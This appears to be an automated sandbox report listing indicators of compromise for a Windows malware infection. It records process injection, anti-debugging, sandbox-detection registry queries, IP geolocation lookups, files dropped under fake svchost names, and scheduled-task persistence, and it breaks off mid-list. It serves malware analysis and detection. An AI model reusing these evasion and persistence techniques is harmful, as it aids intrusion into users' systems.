description ioc Process File opened (read-only) \??\G: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\S: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 ipinfo.io 292 ipinfo.io 323 ipinfo.io 2 ip-api.com 53 ipinfo.io 240 ipinfo.io 304 ipinfo.io 391 ipinfo.io 2 ipinfo.io 239 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\ntkrnlmp.pdb WerFault.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 5228 227470.exe 5628 Conhost.exe 5156 CccUqSnvorEDEpUpxK4J3YF5.exe 5968 Conhost.exe 6740 Conhost.exe 6996 RfdHYMkUrnVfH1ZtERmjgC7e.exe 2012 Conhost.exe 3824 Q_fET_usQo2X_6EmGsXsx62w.exe 7848 8588289.exe -
Suspicious use of SetThreadContext 16 IoCs
description pid Process procid_target PID 3436 set thread context of 5504 3436 Wed128c2773227671b3f.exe 132 PID 4616 set thread context of 5512 4616 Wed121f7e9e92793cf.exe 130 PID 2996 set thread context of 5532 2996 Wed12859e3c1cf63b6a0.exe 131 PID 6004 set thread context of 5592 6004 JoVBqle5ZuYZOmKRj95tPfGf.exe 172 PID 5348 set thread context of 6456 5348 Conhost.exe 195 PID 5420 set thread context of 3196 5420 ArGiap3960SUZs1dAEDT_gNj.exe 32 PID 1288 set thread context of 3196 1288 7elpvTmw1vT1ONC9ndp6H4va.exe 32 PID 6892 set thread context of 1416 6892 MegogoSell_crypted.exe 269 PID 4468 set thread context of 7540 4468 8355.exe 331 PID 5956 set thread context of 7472 5956 hgFUPQSfVWja4bF9va2Nco94.exe 353 PID 6512 set thread context of 3196 6512 systray.exe 32 PID 1088 set thread context of 552 1088 hgFUPQSfVWja4bF9va2Nco94.exe 398 PID 2788 set thread context of 7368 2788 hepatocyte.exe 435 PID 8676 set thread context of 7488 8676 1CE5.exe 470 PID 2220 set thread context of 6908 2220 877E.exe 605 PID 7180 set thread context of 5364 7180 scriptwriters.exe 671 -
Drops file in Program Files directory 21 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe File created C:\Program Files\Common Files\System\sememe\svchost.exe hgFUPQSfVWja4bF9va2Nco94.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe File created C:\Program Files (x86)\Windows Mail\Bududosopo.exe.config DYbALA.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini T95LOChSK2FJnZ8sP6x6_E2w.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe IjhdP4nV_bnmATIamZ0oM7vu.exe File created C:\Program Files (x86)\FarLabUninstaller\is-BERPI.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-N703M.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-3MEEL.tmp setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe T95LOChSK2FJnZ8sP6x6_E2w.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-75206.tmp setup.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\Windows Mail\Bududosopo.exe DYbALA.exe File created C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe T95LOChSK2FJnZ8sP6x6_E2w.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe setup.tmp File created C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe DYbALA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe T95LOChSK2FJnZ8sP6x6_E2w.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe setup.tmp -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\Cursors\veejays\svchost.exe 877E.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\LiveKernelReports\WATCHDOG\WATCHDOG-20211108-0823.dmp WerFault.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File created C:\Windows\System\xxx1.bak Conhost.exe File created C:\Windows\System\svchost.exe Conhost.exe File opened for modification C:\Windows\System\svchost.exe Conhost.exe File created C:\Windows\SystemTemp\WER-259937906-0.sysdata.xml WerFault.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 39 IoCs
pid pid_target Process procid_target 1912 2116 WerFault.exe 83 2608 3764 WerFault.exe 111 5348 1116 WerFault.exe 123 988 3228 WerFault.exe 142 4640 408 WerFault.exe 151 6288 2960 WerFault.exe 149 6884 5824 WerFault.exe 160 7156 5932 WerFault.exe 154 6240 5816 WerFault.exe 220 5824 5984 WerFault.exe 238 3044 2432 WerFault.exe 216 6328 1596 WerFault.exe 239 1584 6820 WerFault.exe 240 1052 6608 WerFault.exe 228 7892 2200 WerFault.exe 257 4540 6176 WerFault.exe 305 1052 5984 WerFault.exe 310 4584 5952 WerFault.exe 378 9004 7384 WerFault.exe 326 8636 7496 WerFault.exe 328 4732 1064 WerFault.exe 355 8696 1064 WerFault.exe 355 5316 8924 WerFault.exe 410 6492 5608 WerFault.exe 421 9028 9128 WerFault.exe 418 5396 3404 WerFault.exe 436 5352 8036 WerFault.exe 455 4036 6420 WerFault.exe 454 7380 400 WerFault.exe 498 3032 2440 WerFault.exe 502 5288 2312 WerFault.exe 508 6400 9072 WerFault.exe 515 3016 8884 WerFault.exe 523 5112 8884 WerFault.exe 523 7332 8516 WerFault.exe 604 6260 8516 WerFault.exe 604 8940 8540 WerFault.exe 628 6476 2156 WerFault.exe 656 5416 6460 WerFault.exe 642 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8355.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI JoVBqle5ZuYZOmKRj95tPfGf.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI JoVBqle5ZuYZOmKRj95tPfGf.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI JoVBqle5ZuYZOmKRj95tPfGf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8355.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8355.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Underdress.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 5qlTraWDq1vzRdVRwFZUNz29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Underdress.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Underdress.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Underdress.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Underdress.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7724 schtasks.exe 7044 schtasks.exe 7716 schtasks.exe 5932 schtasks.exe 2372 schtasks.exe 2156 schtasks.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 5qlTraWDq1vzRdVRwFZUNz29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Underdress.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 5qlTraWDq1vzRdVRwFZUNz29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Underdress.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 5392 ipconfig.exe -
Kills process with taskkill 7 IoCs
pid Process 6624 taskkill.exe 4560 taskkill.exe 5152 taskkill.exe 7008 taskkill.exe 6076 taskkill.exe 7636 taskkill.exe 4228 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WerFault.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\ValidDeviceId svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02grcmqafcyquvns\DeviceId = "<Data LastUpdatedTime=\"1636388669\"><User username=\"02GRCMQAFCYQUVNS\"><HardwareInfo BoundTime=\"1636388678\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WerFault.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\P3P = "CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\"" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Flags = "8256" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\URL = "https://login.live.com" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02grcmqafcyquvns\DeviceId = "<Data LastUpdatedTime=\"1636388669\"><User username=\"02GRCMQAFCYQUVNS\"><HardwareInfo BoundTime=\"1636388669\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WerFault.exe Key created 